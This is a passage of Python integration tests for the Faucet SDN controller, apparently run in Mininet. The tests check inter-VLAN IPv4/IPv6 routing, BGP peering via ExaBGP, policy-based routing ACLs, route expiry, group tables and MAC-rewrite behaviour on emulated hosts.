first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('fc00::1:99/64')
faucet_vip_ip = ipaddress.ip_interface('fc00::1:3/126')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, ipaddress.ip_interface('fc00::1:1/64'))
# We use a narrower mask to force second_host to use the /128 route,
# since otherwise it would realize :99 is directly connected via ND and send direct.
self.add_host_ipv6_address(second_host, ipaddress.ip_interface('fc00::1:2/126'))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, faucet_vip_ip.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '6', 'vlan': '100'}),
1)
class FaucetUntaggedIPv4GlobalInterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
200:
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC2 + """
routers:
global:
vlans: [100, 200]
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
global_vlan: 300
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 200
"""
exabgp_peer_conf = """
static {
route 10.99.99.0/24 next-hop 10.200.0.1 local-preference 100;
route 10.0.5.0/24 next-hop 127.0.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'), vlan_vid=300)
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
class FaucetUntaggedIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
for vlanb_vid in (300, 200):
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.change_vlan_config(
'vlanb', 'vid', vlanb_vid, restart=True, cold_start=True)
class FaucetUntaggedPortSwapIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
vlana:
vid: 100
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [vlana, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: vlana
%(port_2)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_connectivity(host_a, host_b):
host_a.setIP(str(first_host_ip.ip), prefixLen=24)
host_b.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(host_a, second_host_ip, first_faucet_vip.ip)
self.add_host_route(host_b, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(host_a, second_host_ip.ip)
self.one_ipv4_ping(host_b, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(host_a, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(host_b, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
test_connectivity(first_host, second_host)
# Delete port 1, add port 3
self.change_port_config(
self.port_map['port_1'], None, None,
restart=False, cold_start=False)
self.add_port_config(
self.port_map['port_3'], {'native_vlan': 'vlana'},
restart=True, cold_start=True)
test_connectivity(third_host, second_host)
class FaucetUntaggedExpireIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
max_host_fib_retry_count: 2
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
second_host.cmd('ifconfig %s down' % second_host.defaultIntf().name)
log_file = os.path.join(self.tmpdir, 'faucet.log')
expired_re = r'.+expiring dead route %s.+' % second_host_ip.ip
self.wait_until_matching_lines_from_file(expired_re, log_file)
second_host.cmd('ifconfig %s up' % second_host.defaultIntf().name)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
class FaucetUntaggedIPv6InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["fc00::1:254/112", "fe80::1:254/112"]
vlanb:
vid: 200
faucet_vips: ["fc01::1:254/112", "fe80::2:254/112"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.add_host_ipv6_address(second_host, second_host_net)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedIPv4PolicyRouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# want to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedIPv4PolicyRouteOrdereredTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
- swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
- swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# want to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedMixedIPv4RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["172.16.0.254/24", "10.0.0.254/24"]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('10.0.0.1/24')
second_host_net = ipaddress.ip_interface('172.16.0.1/24')
second_host.setIP(str(second_host_net.ip), prefixLen=24)
self.one_ipv4_ping(first_host, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, self.FAUCET_VIPV4_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV4.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV4_2.ip)
self.one_ipv4_ping(first_host, second_host_net.ip)
self.one_ipv4_ping(second_host, first_host_net.ip)
class FaucetUntaggedMixedIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112", "fc01::1:254/112"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.one_ipv6_ping(first_host, self.FAUCET_VIPV6.ip)
self.add_host_ipv6_address(second_host, second_host_net)
self.one_ipv6_ping(second_host, self.FAUCET_VIPV6_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedBGPIPv6DefaultRouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route ::/0 next-hop fc00::1:1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
first_host_alias_ip = ipaddress.ip_interface('fc00::50:1/112')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV6.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.one_ipv6_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route fc00::10:0/112 next-hop fc00::1:1 local-preference 100;
route fc00::20:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::30:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::40:0/112 next-hop fc00::1:254;
route fc00::50:0/112 next-hop fc00::2:2;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+fc00::40:0\/112.+cannot be us$')
self.verify_ipv6_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv6_routing_mesh()
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedSameVlanIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::10:1/112", "fc00::20:1/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::10:2"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::20:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::10:2/112')
first_host_ctrl_ip = ipaddress.ip_address('fc00::10:1')
second_host_ip = ipaddress.ip_interface('fc00::20:2/112')
second_host_ctrl_ip = ipaddress.ip_address('fc00::20:1')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
self.add_host_route(
first_host, second_host_ip, first_host_ctrl_ip)
self.add_host_route(
second_host, first_host_ip, second_host_ctrl_ip)
self.wait_for_route_as_flow(
first_host.MAC(), first_host_ip.network)
self.wait_for_route_as_flow(
second_host.MAC(), second_host_ip.network)
self.one_ipv6_ping(first_host, second_host_ip.ip)
self.one_ipv6_ping(first_host, second_host_ctrl_ip)
self.one_ipv6_ping(second_host, first_host_ip.ip)
self.one_ipv6_ping(second_host, first_host_ctrl_ip)
class FaucetUntaggedIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
- route:
ip_dst: "fc00::30:0/112"
ip_gw: "fc00::1:2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1')
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.verify_ipv6_routing_mesh()
second_host = self.hosts_name_ordered()[1]
self.flap_all_switch_ports()
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv6Network('fc00::30:0/112'))
self.verify_ipv6_routing_mesh()
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'fc00::1:0/112 next-hop fc00::1:254',
'fc00::10:0/112 next-hop fc00::1:1',
'fc00::20:0/112 next-hop fc00::1:2',
'fc00::30:0/112 next-hop fc00::1:2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetTaggedIPv6RouteTest(FaucetTaggedTest):
"""Test basic IPv6 routing without BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
"""Test IPv6 routing works."""
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
first_host_routed_ip = ipaddress.ip_interface('fc00::10:1/112')
second_host_routed_ip = ipaddress.ip_interface('fc00::20:1/112')
for _coldstart in range(2):
for _swaps in range(5):
self.verify_ipv6_routing_pair(
first_host, first_host_ip, first_host_routed_ip,
second_host, second_host_ip, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
class FaucetGroupTableTest(FaucetUntaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_BOILER_UNTAGGED
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetTaggedGroupTableTest(FaucetTaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_TAGGED_BOILER
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetEthSrcMaskTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_src: 0e:0d:00:00:00:00/ff:ff:00:00:00:00
actions:
allow: 1
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:0d:00:00:00:99')
self.retry_net_ping(hosts=(first_host, second_host))
self.wait_nonzero_packet_count_flow(
{'dl_src': '0e:0d:00:00:00:00/ff:ff:00:00:00:00'},
table_id=self._PORT_ACL_TABLE)
class FaucetDestRewriteTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2.mac should appear in third host, and not second host, as
# the acl should rewrite the dst mac.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetDestRewriteOrderedTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
